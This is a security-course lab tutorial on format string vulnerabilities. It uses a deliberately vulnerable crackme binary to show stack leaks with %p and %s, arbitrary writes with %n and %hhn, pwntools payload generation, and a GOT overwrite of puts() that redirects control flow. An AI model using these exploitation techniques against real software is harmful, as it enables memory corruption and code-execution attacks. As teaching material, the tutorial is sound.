Tut05: Format String Vulnerability

In this tutorial, we'll explore a powerful new class of bug, called a "format string vulnerability". Though it looks benign at first, this type of bug allows for arbitrary reads and writes in memory, and thus, arbitrary code execution.

Step 0. Enhanced crackme0x00

We've finally eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <err.h>

#include "flag.h"

unsigned int secret = 0xdeadbeef;

void handle_failure(char *buf) {
  char msg[100];
  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);
}

int main(int argc, char *argv[])
{
  setreuid(geteuid(), geteuid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  int tmp = secret;

  char buf[100];
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  fgets(buf, sizeof(buf), stdin);

  if (!strcmp(buf, "250382\n")) {
    printf("Password OK :)\n");
  } else {
    handle_failure(buf);
  }

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

  return 0;
}

$ checksec --file crackme0x00
[*] '/home/lab05/tut05-fmtstr/crackme0x00'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

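As you can see, the binary is protected by a stack canary and NX. Note, however, that RELRO is only partial and PIE is disabled, so the GOT remains writable and the binary's own addresses are fixed.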

NOTE. The following two lines disable buffering on stdout and stdin, so output appears immediately and input isn't held back in a buffer. They're just there to make your life easier.

setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);

It works similarly to before, but when we type an incorrect password, it now produces an error message like this:

$ ./crackme0x00
IOLI Crackme Level 0x00
Password:asdf
Invalid Password! asdf

Unfortunately, this program is using printf() in a very insecure way.

snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
printf(msg);

Notice that after the first line above, msg will contain your input (the invalid password). If that input happens to contain a format specifier (%), the printf() in the second line will interpret it. This creates a security issue.

Some common format specifiers are:

  • %p: pointer
  • %s: string
  • %d: int
  • %x: hex

Let's try typing %p:

$ ./crackme0x00
IOLI Crackme Level 0x00
Password:%p
Invalid Password! 0x64

What's 0x64 in base-10? What do you think this represents in the code?

Let's go crazy by putting more %ps. How about 15?

$ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00
Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...

We seem to be able to see the values for 15 (or more -- we chose 15 arbitrarily) nonexistent arguments to the printf() call.
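Typing such a probe by hand gets error-prone quickly. Here is a minimal Python sketch that generates it; the helper name build_probe is ours and is not part of the tutorial's files.

```python
def build_probe(count):
    """Return 'i=%p' items for i = 1..count, joined with '|'."""
    return "|".join(f"{i}=%p" for i in range(1, count + 1))


if __name__ == "__main__":
    # Pipe this into ./crackme0x00 in place of the hand-written echo string.
    print(build_probe(15))
```

Labeling each %p with its index makes it easy to match a printed value to its argument position.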

1=0x64
2=0x8048a40
3=0xffe1f428
4=0xf7f3ce89
...
10=0x61766e49
11=0x2064696c
12=0x73736150
13=0x64726f77
14=0x3d312021
15=0x327c7025

Where are those values coming from?

By the way, it's rather tedious to put lots of %ps to see these values. Luckily, printf-like functions provide a convenient way to access the n'th argument: %[nth]$p (e.g., %1$p = first argument). Let's try it:

$ echo '%10$p' | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! 0x61766e49

As expected, the value printed matches the tenth one listed above.

NOTE: Be sure to use single quotes (') rather than double quotes ("), to prevent your shell from trying to interpret the $ itself (e.g., like $PATH). If you do later need a format-string argument that includes interpolation, use " and backslash-escape the format-specifier $s (i.e., "\$").

Step 1. Using the Format String Bug to Perform an Arbitrary Read

Let's exploit this format-string bug to read a value from an arbitrary memory address.

Have you noticed these interesting values in the output earlier?

4=0xf7f3ce89
...
10=0x61766e49  'Inva'
11=0x2064696c  'lid '
12=0x73736150  'Pass'
13=0x64726f77  'word'
14=0x3d312021  '! 1='
15=0x327c7025  '%p|2'
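The ASCII annotations above can be reproduced by packing each leaked value as a 32-bit little-endian word (i386 is little-endian). This is a small sketch; the helper name words_to_text is hypothetical.

```python
import struct


def words_to_text(words):
    """Pack each 32-bit value as little-endian bytes and decode as ASCII."""
    raw = b"".join(struct.pack("<I", word) for word in words)
    return raw.decode("ascii", errors="replace")


# Values 10..15 from the %p output shown earlier.
leaked = [0x61766e49, 0x2064696c, 0x73736150,
          0x64726f77, 0x3d312021, 0x327c7025]

if __name__ == "__main__":
    print(repr(words_to_text(leaked)))  # 'Invalid Password! 1=%p|2'
```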

We can actually see our input string itself. We know that that string is stored on the stack, so it seems that what we put onto the stack is actually being interpreted as additional printf() arguments. What's going on?

When you invoke a printf()-like function, your arguments are passed via the stack, like this:

printf("%s", a1, a2);

[ ra ]
[ s  ] --+  < 1st printf() argument: pointer to the format string
[ a1 ]   |  < 2nd printf() argument: a1, the 1st format-string argument (aka %1$s)
[ a2 ]   |  < 3rd printf() argument: a2, the 2nd format-string argument (aka %2$s)
["%s"] <-+  < the actual string data itself, on the stack
[ ...]

Only three arguments are passed to printf() here, but printf() itself has no way of knowing that. So if the format string calls for higher-numbered arguments, printf() will faithfully read more data from the stack, since that's where those arguments would be if they did exist.

In this simple case, the third "argument" (i.e. %3$s) happens to be the format string data itself, so we have full control over its value! You can take advantage of this to read a few bytes from an arbitrary memory address, like this:

printf("\xaa\xaa\xaa\xaa%3$s", a1, a2);

    [ ra ]
    [ s  ] --+
    [ a1 ]   |
    [ a2 ]   |
+-- [aaaa] <-+
|   [ ...]
|
V
?

This reads and prints a string (%s) at an address indicated by "the third argument," which we've set up to contain address 0xaaaaaaaa. By modifying the value of that address, we can make printf() read a string from anywhere.
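As a rough sketch, the format string from the diagram can be assembled in Python like this. The helper read_payload is hypothetical, and it assumes the simplified layout above, where the address lands exactly in the slot that the chosen argument index reads; the real target needs a different index and some alignment padding.

```python
import struct


def read_payload(address, arg_index):
    """Put a 32-bit little-endian address first, then a %s that reads through it."""
    return struct.pack("<I", address) + f"%{arg_index}$s".encode("ascii")


if __name__ == "__main__":
    print(read_payload(0xaaaaaaaa, 3))
```

Building the payload as bytes (not str) matters, because addresses usually contain non-printable bytes.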

In the case of the actual target binary, where is your input string located on the stack? That is, what value of N below results in this output?

$ echo 'BBAAAA%N$p' | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! BBAAAA0x41414141

What happens if we then replace %p with %s? How does it crash?

You can examine the stack to understand how the format string bug works. As you can see, there are pointers to your input string AABBBB in the 3rd and 7th entries of the stack, and a copy of the value BBBB itself exists in the 15th entry.

pwndbg> x/100i handle_failure
   0x804880b <handle_failure>:          push   ebp
   0x804880c <handle_failure+1>:        mov    ebp,esp
   0x804880e <handle_failure+3>:        sub    esp,0x88
   ...
   0x8048841 <handle_failure+54>:       push   eax
   0x8048842 <handle_failure+55>:       call   0x8048520 <printf@plt>

pwndbg> b *0x8048842
Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14.

pwndbg> r
Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC

IOLI Crackme Level 0x00
Password:AABBBB

pwndbg> stack 30
    00:0000| esp    0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva')
    01:0004|        0xffd86b54 <- 0x64 /* 'd' */
    02:0008|        0xffd86b58 -> 0x8048a40 <- dec    ecx
    03:000c|        0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n'
    04:0010|        0xffd86b60 -> 0xf7f0eeb9
    05:0014|        0xffd86b64 <- 0x1
    06:0018|        0xffd86b68 <- 0x0
    07:001c|        0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n'
    08:0020|        0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12)
    09:0024|        0xffd86b74 -> 0xf7f14028 (_dl_fixup+184)
    0a:0028| eax    0xffd86b78 <- 0x61766e49 ('Inva')
    0b:002c|        0xffd86b7c <- 0x2064696c ('lid ')
    0c:0030|        0xffd86b80 <- 0x73736150 ('Pass')
    0d:0034|        0xffd86b84 <- 'word! AABBBB\n\n'
    0e:0038|        0xffd86b88 <- '! AABBBB\n\n'
=>  0f:003c|        0xffd86b8c <- 'BBBB\n\n'
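The relationship between a stack address in this listing and the printf() argument index is simple arithmetic: at the call, esp points at the format-string pointer (index 0), and each following 4-byte slot is the next argument. A small sketch, with arg_index as a hypothetical helper name:

```python
def arg_index(esp, slot_address, word_size=4):
    """Map a stack address to the printf() positional index that reads it.

    esp is the stack pointer at the call to printf(); the word it points at
    is the format-string pointer, so esp + 4 is %1$, esp + 8 is %2$, etc.
    """
    offset = slot_address - esp
    if offset < 0 or offset % word_size:
        raise ValueError("address is not an aligned slot at or above esp")
    return offset // word_size


if __name__ == "__main__":
    esp = 0xffd86b50
    for slot in (0xffd86b5c, 0xffd86b6c, 0xffd86b8c):
        print(hex(slot), "->", arg_index(esp, slot))
```

For the listing above this yields 3, 7, and 15, matching the entries discussed in the text.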

You can check this yourself, too. If you try to print the 3rd or 7th argument as a string, it inserts a copy of your input:

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%3$s
Invalid Password! AABBBBAABBBB%3$s

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%7$s
Invalid Password! AABBBBAABBBB%7$s

But attempting to dereference the 15th stack entry causes a segmentation fault, because that value is not a valid pointer: it's the raw string "BBBB" (0x42424242), which %s tries to follow as if it were an address:

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%15$s
Segmentation fault (core dumped)

What happens if you replace the "BBBB" with a valid address and try that again?

[Task] How can you use this to read the global variable "secret"?

You can find the address of secret using nm (or GDB or Ghidra):

$ nm crackme0x00 | grep secret
0804a050 D secret
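Before embedding an address in your input, it's worth checking that none of its bytes will cut the input short. In this program, fgets() stops reading at a newline (0x0a), and the %s in snprintf() stops copying at a NUL (0x00). The following sketch performs that check; bad_bytes_in is a hypothetical helper name.

```python
import struct

# Bytes that would truncate the input in this particular program.
BAD_BYTES = {
    0x00: "NUL ends the %s copy in snprintf()",
    0x0a: "newline ends the fgets() read",
}


def bad_bytes_in(address):
    """Return the problematic byte values found in a packed 32-bit address."""
    packed = struct.pack("<I", address)
    return sorted(byte for byte in set(packed) if byte in BAD_BYTES)


if __name__ == "__main__":
    print(bad_bytes_in(0x0804a050))  # address of secret from nm: []
```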

Step 2. Using the Format String Bug to Perform an Arbitrary Write

printf() is very complex, and actually even supports a sort of "write" operation: it can write the total number of bytes printed so far to a specified location.

  • %n: write number of bytes printed (as an int)

int len;
printf("aaaa%nbbbb", &len);
// `len` now contains 4, because 4 bytes had been printed so far at that point

Using this, and a similar trick to the arbitrary read, you can write to an arbitrary memory location like this:

printf("\xaa\xaa\xaa\xaa%3$n", a1, a2);

     [ ra ]
     [ s  ] --+
     [ a1 ]   |
     [ a2 ]   |
 +-- [aaaa] <-+
 |   [ ...]
 |
 V
...

*0xaaaaaaaa = 4 (i.e., 4 "\xaa"s have been printed so far)

With this idea, we clearly have full control over the address, but so far it seems we can only write the number "4" there. How can we write an arbitrary value?

To do that, we need to use another useful printf() format specifier: %[len]d (e.g., %10d). This prints an integer (we don't care which one) using at minimum len characters. This can be used to quickly raise the value that %n will write, without requiring an excessively long format string.

For example, to write 10 to 0xaaaaaaaa, you can print 6 more characters, like this:

printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2);
                        ^^^

*0xaaaaaaaa = 10;
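The padding width is just the target value minus the number of characters already printed. Here is a sketch that builds the format string for the simplified layout above; write_payload is a hypothetical helper, and it assumes the integer printed by %d is no wider than the requested width (otherwise more characters come out than planned).

```python
import struct


def write_payload(address, value, arg_index):
    """Build address + %<width>d + %<arg_index>$n for the toy stack layout."""
    already_printed = 4  # the four address bytes at the start of the string
    if value < already_printed:
        raise ValueError("cannot write less than what is already printed")
    width = value - already_printed
    pad = f"%{width}d" if width else ""
    return struct.pack("<I", address) + f"{pad}%{arg_index}$n".encode("ascii")


if __name__ == "__main__":
    print(write_payload(0xaaaaaaaa, 10, 3))
```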

And now you can write an arbitrary value to an arbitrary location. Almost.

Let's suppose you want to write the value 0xc0ffee to 0xaaaaaaaa. We'd prefer to avoid having to generate 12648430 bytes of output, so it'd be better to write this value byte-by-byte instead, which would involve far smaller numbers. You might think to do that with these operations:

*(int *)0xaaaaaaaa = 0x000000ee;
*(int *)0xaaaaaaab = 0x000000ff;
*(int *)0xaaaaaaac = 0x000000c0;

But the problem is that once characters have been printed, they can't be "un-printed", so the count that %n writes can only grow as the format string is processed. So the writes would need to be done in order of increasing value:

*(int *)0xaaaaaaac = 0x000000c0;
*(int *)0xaaaaaaaa = 0x000000ee;
*(int *)0xaaaaaaab = 0x000000ff;

But when you write the 4-byte integer 0x000000ee to 0xaaaaaaaa, you overwrite the byte 0xc0 at 0xaaaaaaac with a null byte. So that won't work.
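You can convince yourself of this with a small simulation that applies 4-byte little-endian stores to a scratch buffer standing in for the memory at 0xaaaaaaaa. This is only a model of the stores, not of printf() itself, and the names are ours.

```python
import struct

BASE = 0xaaaaaaaa  # address that offset 0 of the scratch buffer represents


def apply_int_writes(writes, size=8):
    """Apply 4-byte stores in order; return the 32-bit value left at BASE."""
    memory = bytearray(size)
    for address, value in writes:
        struct.pack_into("<I", memory, address - BASE, value)
    return struct.unpack_from("<I", memory, 0)[0]


# Order forced by the ever-growing character count.
increasing = [(0xaaaaaaac, 0xc0), (0xaaaaaaaa, 0xee), (0xaaaaaaab, 0xff)]
# Order that would work, but needs the count to go 0xee, 0xff, 0xc0.
natural = [(0xaaaaaaaa, 0xee), (0xaaaaaaab, 0xff), (0xaaaaaaac, 0xc0)]

if __name__ == "__main__":
    print(hex(apply_int_writes(increasing)))  # 0xffee
    print(hex(apply_int_writes(natural)))     # 0xc0ffee
```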

There is a solution! There exist smaller-sized versions of %n:

  • %hn: write number of bytes printed (as a short)
  • %hhn: write number of bytes printed (as a byte)

That is, you can do this:

printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2);

*(unsigned char*)0xaaaaaaaa = 10;

This solves two problems at the same time:

  • We can now perform the writes in any order, because they no longer overwrite each other with extra null bytes.
  • Since only the lowest 8 bits of the value are written, we can make the value decrease by using integer overflow. For example, if we've written the value 0xff, and we want to write 0xc0 next, we can do that by generating 0xc1 bytes of additional string output so that the counter reaches 0x1c0, which will then be truncated to 0xc0 when written as a single byte.

*(unsigned char*)0xaaaaaaaa = 0xee;
*(unsigned char*)0xaaaaaaab = 0xff;
*(unsigned char*)0xaaaaaaac = 0xc0;  // lowest 8 bits of 0x1c0
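The amount of extra output needed before each %hhn follows from modulo-256 arithmetic. The sketch below computes it for a sequence of single-byte writes; plan_byte_writes is a hypothetical helper, and it only plans the padding rather than building a full format string.

```python
def plan_byte_writes(address, value, num_bytes, already_printed=0):
    """Return (target_address, padding) pairs for consecutive %hhn writes.

    Bytes are written lowest address first. Each padding is the number of
    extra characters to print so the low 8 bits of the running count equal
    the wanted byte.
    """
    plan = []
    count = already_printed
    for i in range(num_bytes):
        wanted = (value >> (8 * i)) & 0xff
        padding = (wanted - count) % 256  # wraps around when count > wanted
        count += padding
        plan.append((address + i, padding))
    return plan


if __name__ == "__main__":
    for target, padding in plan_byte_writes(0xaaaaaaaa, 0xc0ffee, 3):
        print(hex(target), padding)
```

For 0xc0ffee this gives paddings of 238, 17, and 193 (0xc1), the last one being the wrap-around case described above.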

[Task] Can you overwrite the secret value with 0xc0ffee?

Step 3. Using pwntools

It's important to understand the core idea of how to construct a format string that writes an arbitrary value to an arbitrary location, but when you try to actually implement one, you'll quickly find that it's very tedious to do manually. Fortunately, pwntools provides a format string exploit generator for you.

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • offset (int): the first formatter's offset you control
  • writes (dict): dict with addr, value {addr: value, addr2: value2}
  • numbwritten (int): the number of bytes already written by printf()

Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have control of the format string at the 4th param (i.e., %4$p), but we've already printed out 10 characters.

$ python3 -c 'from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))'
%228c%13$n%17c%14$hhn%193c%15$hhnaaa\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa
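To see why this output does the job, you can replay it with a toy interpreter. The sketch below is not pwntools and not a real printf(): it only understands the %<N>c and %<K>$n / %<K>$hn / %<K>$hhn directives, and it assumes argument `offset` reads the first 4 bytes of the payload. The payload bytes are copied from the output above.

```python
import re
import struct

DIRECTIVE = re.compile(rb"%(?:(\d+)c|(\d+)\$(hh|h)?n)")
WRITE_SIZE = {None: 4, b"h": 2, b"hh": 1}


def simulate(payload, offset, numbwritten):
    """Return {byte_address: value} for every byte the payload would write."""
    memory = {}
    count = numbwritten
    position = 0
    for match in DIRECTIVE.finditer(payload):
        count += match.start() - position  # literal bytes between directives
        position = match.end()
        if match.group(1) is not None:
            count += int(match.group(1))   # %<N>c prints N characters
            continue
        size = WRITE_SIZE[match.group(3)]
        slot = (int(match.group(2)) - offset) * 4
        (address,) = struct.unpack_from("<I", payload, slot)
        stored = (count % (1 << (8 * size))).to_bytes(size, "little")
        for i, byte in enumerate(stored):
            memory[address + i] = byte
    return memory


PAYLOAD = (b"%228c%13$n%17c%14$hhn%193c%15$hhnaaa"
           + struct.pack("<III", 0xaaaaaaaa, 0xaaaaaaab, 0xaaaaaaac))

if __name__ == "__main__":
    written = simulate(PAYLOAD, offset=4, numbwritten=10)
    print({hex(a): hex(v) for a, v in sorted(written.items())})
```

Note how the first write uses a full %n: it stores 0xee and also zeroes the three bytes above it, so the later %hhn writes only need to fill in 0xff and 0xc0.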

[Task] Is this similar to what you've come up with to write 0xc0ffee to the secret value? Please modify template.py to overwrite the secret value (if you succeed, the binary will print "The secret is modified!")!

Step 4. Arbitrary Execution!

Your task for today is to launch a control-hijacking attack using this format string vulnerability. The plan is simple: overwrite the GOT entry of puts() with the address of print_key(), so that when puts() is invoked, execution is actually redirected to print_key().

Here's an explanation of the GOT in case you haven't heard of it. The Global Offset Table ("GOT" for short) is a table in the process's memory which contains pointers to external functions (e.g., puts() or printf() in libc). Each entry corresponds to one function the compiler expects the binary to use.

When the dynamic loader (ld.so) initially loads the program, the GOT is (roughly speaking -- the actual behavior will be demonstrated shortly) filled with pointers to "_dl_runtime_resolve()":

[&_dl_runtime_resolve]  <- entry for printf()
[&_dl_runtime_resolve]  <- entry for puts()
[&_dl_runtime_resolve]  <- entry for scanf()
[&_dl_runtime_resolve]  <- entry for exit()
...

The first time the process attempts to call an external function through this table, _dl_runtime_resolve() is invoked. It obtains the real address of the desired function (i.e., the real address of puts() in libc), updates the table, and calls the function.

[&_dl_runtime_resolve]  <- entry for printf()
[&puts]                 <- entry for puts()
[&_dl_runtime_resolve]  <- entry for scanf()
[&_dl_runtime_resolve]  <- entry for exit()
...

After that, any further calls to the same external function (e.g., puts()) will therefore be immediately directed to the real address.
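The lazy-binding idea can be modeled in a few lines of Python. This is purely a conceptual toy (all names are ours, and real resolution happens in the loader, not in a dictionary): each slot starts as a resolver stub, gets patched on first use, and can be redirected by anyone able to write to the table.

```python
def libc_puts(text):
    """Stand-in for the real puts() in libc."""
    return f"puts: {text}"


def print_key(_text):
    """Stand-in for the function an attacker wants to reach."""
    return "print_key reached"


class ToyGot:
    def __init__(self, library):
        self.library = library
        self.resolve_count = 0
        # Every slot starts out pointing at a resolver stub.
        self.slots = {name: self._stub(name) for name in library}

    def _stub(self, name):
        def resolve_and_call(*args):
            self.resolve_count += 1
            self.slots[name] = self.library[name]  # patch the slot
            return self.slots[name](*args)
        return resolve_and_call

    def call(self, name, *args):
        """Model of `jmp [name@got.plt]`: jump to whatever the slot holds."""
        return self.slots[name](*args)


if __name__ == "__main__":
    got = ToyGot({"puts": libc_puts})
    print(got.call("puts", "first"))   # resolved lazily, then called
    print(got.call("puts", "second"))  # goes straight to libc_puts
    got.slots["puts"] = print_key      # what the format string will do
    print(got.call("puts", "third"))
```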

Let's see this in action. Here's the code snippet in main() that calls puts("The secret is modified!\n"):

0x0804891b <+189>:	sub    esp,0xc
0x0804891e <+192>:	push   0x8048a80
0x08048923 <+197>:	call   0x8048590 <puts@plt>

Note that "puts@plt" is not the real "puts()" in libc -- 0x8048590 is in your code section (try vmmap 0x8048590). The real puts() from libc is located here:

  > x/4i puts
   0xf7db7b40 <puts>:   push   ebp
   0xf7db7b41 <puts+1>:	mov    ebp,esp
   0xf7db7b43 <puts+3>:	push   edi
   0xf7db7b44 <puts+4>:	push   esi

puts@plt means "puts at the Procedure Linkage Table (PLT)"; it points to one of the entries in the PLT:

> pdisas 0x8048590-0x20
 > 0x8048570 <err@plt>           jmp    dword ptr [err@got.plt]       <0x804a024>

   0x8048576 <err@plt+6>         push   0x30
   0x804857b <err@plt+11>        jmp    0x8048500                     <0x8048500>

   0x8048580 <fread@plt>         jmp    dword ptr [fread@got.plt]     <0x804a028>

   0x8048586 <fread@plt+6>       push   0x38
   0x804858b <fread@plt+11>      jmp    0x8048500                     <0x8048500>

   0x8048590 <puts@plt>          jmp    dword ptr [puts@got.plt]      <0x804a02c>

   0x8048596 <puts@plt+6>        push   0x40
   0x804859b <puts@plt+11>       jmp    0x8048500                     <0x8048500>

   ...

As you can see, the PLT is a table containing (among other things) stub functions that each just jump to an address read from the GOT. puts@got.plt (0x804a02c) is the actual GOT entry for puts(), where the address is stored.

Let's follow this call (i.e., single-stepping into the call with stepi):

 > 0x8048590  <puts@plt>                  jmp    dword ptr [puts@got.plt]      <0x804a02c>

   0x8048596  <puts@plt+6>                push   0x40
   0x804859b  <puts@plt+11>               jmp    0x8048500                     <0x8048500>
    v
   0x8048500                              push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004>
   0x8048506                              jmp    dword ptr [0x804a008]         <_dl_runtime_resolve>
    v
   0xf7fafe10 <_dl_runtime_resolve>       push   eax
   0xf7fafe11 <_dl_runtime_resolve+1>     push   ecx
   0xf7fafe12 <_dl_runtime_resolve+2>     push   edx

The GOT entry for puts() (puts@got.plt) initially points to puts@plt+6, the instruction right after the jmp at puts@plt. From there, execution ends up invoking _dl_runtime_resolve() with two parameters pushed on the stack: the value stored at _GLOBAL_OFFSET_TABLE_+4 (a loader-owned pointer that identifies this binary), and a value indicating which function should be resolved (0x40, meaning puts()). Once _dl_runtime_resolve() is done, puts@got.plt will point to the real puts() in libc (0xf7db7b40 in the listing above).
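The pushed values (0x30, 0x38, 0x40) and the GOT slots (0x804a024, 0x804a028, 0x804a02c) in the listings line up by simple arithmetic. The sketch below reproduces that mapping. The constants are assumptions read off this binary's listings: the GOT base follows from _GLOBAL_OFFSET_TABLE_+12 being 0x804a00c, the first three slots are taken to be reserved for the loader, and each pushed step of 8 is taken to be one relocation record.

```python
GOT_BASE = 0x804a000   # _GLOBAL_OFFSET_TABLE_ (0x804a00c minus 12)
RESERVED_SLOTS = 3     # GOT+0, GOT+4, GOT+8: assumed loader-owned
REL_ENTRY_SIZE = 8     # assumed size of one i386 PLT relocation record
SLOT_SIZE = 4          # one 32-bit pointer per GOT slot


def got_slot(pushed_value):
    """Map the value pushed by a PLT stub to the address of its GOT slot."""
    index = pushed_value // REL_ENTRY_SIZE
    return GOT_BASE + (RESERVED_SLOTS + index) * SLOT_SIZE


if __name__ == "__main__":
    for name, pushed in (("err", 0x30), ("fread", 0x38), ("puts", 0x40)):
        print(name, hex(got_slot(pushed)))
```

In practice you would read the slot address directly from the disassembly (or let pwntools look it up); the arithmetic is only meant to show that the PLT stubs and GOT slots are laid out in the same order.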

Your goal is to use a format string to overwrite the GOT entry of puts() with another function's address, so that execution will be hijacked when puts() is called.

There are two challenges you'll encounter when doing this:

  1. In order to reach the only call to puts() that occurs after your format string is parsed, you must also overwrite the secret value:

    if (tmp != secret) {
      puts("The secret is modified!\n");
    }
    

    [Task] What should the "writes" param for fmtstr_payload() be?

  2. Unfortunately, the size of the buffer is very limited, meaning it might not be able to fit the format strings for both write targets.

    void handle_failure(char *buf) {
      char msg[100];
      ...
    }
    

Do you remember the %hn/%hhn trick that lets you overwrite fewer bytes at a time, like one or two? That's where write_size comes into play:

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • write_size (str): must be byte, short or int. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
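To get a feel for the trade-off, here is a back-of-the-envelope estimate. It assumes one embedded 4-byte address per written chunk and ignores the length of the directives themselves, and pwntools may merge or reorder writes, so treat the numbers as rough guides only. The helper names are hypothetical; the prefix and buffer size come from handle_failure().

```python
PREFIX = "Invalid Password! "  # written by snprintf() before your input
MSG_SIZE = 100                 # char msg[100] in handle_failure()
CHUNK_BYTES = {"byte": 1, "short": 2, "int": 4}


def input_budget():
    """Bytes of input that survive into msg (one byte is the terminator)."""
    return MSG_SIZE - 1 - len(PREFIX)


def address_bytes(num_targets, write_size, target_width=4):
    """Bytes spent on embedded addresses if every chunk gets its own write."""
    writes = num_targets * (target_width // CHUNK_BYTES[write_size])
    return writes * 4


if __name__ == "__main__":
    print("input budget:", input_budget())
    for size in ("byte", "short", "int"):
        print(size, address_bytes(2, size))
```

Larger write sizes need fewer addresses and directives, at the cost of printing far more padding characters when the program runs.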

Finally! Can you hijack the puts() invocation to redirect it to print_key() to get your flag for this tutorial?

[Task] In the given template.py, modify the payload to redirect the puts() invocation to print_key(), and get your flag!

Reference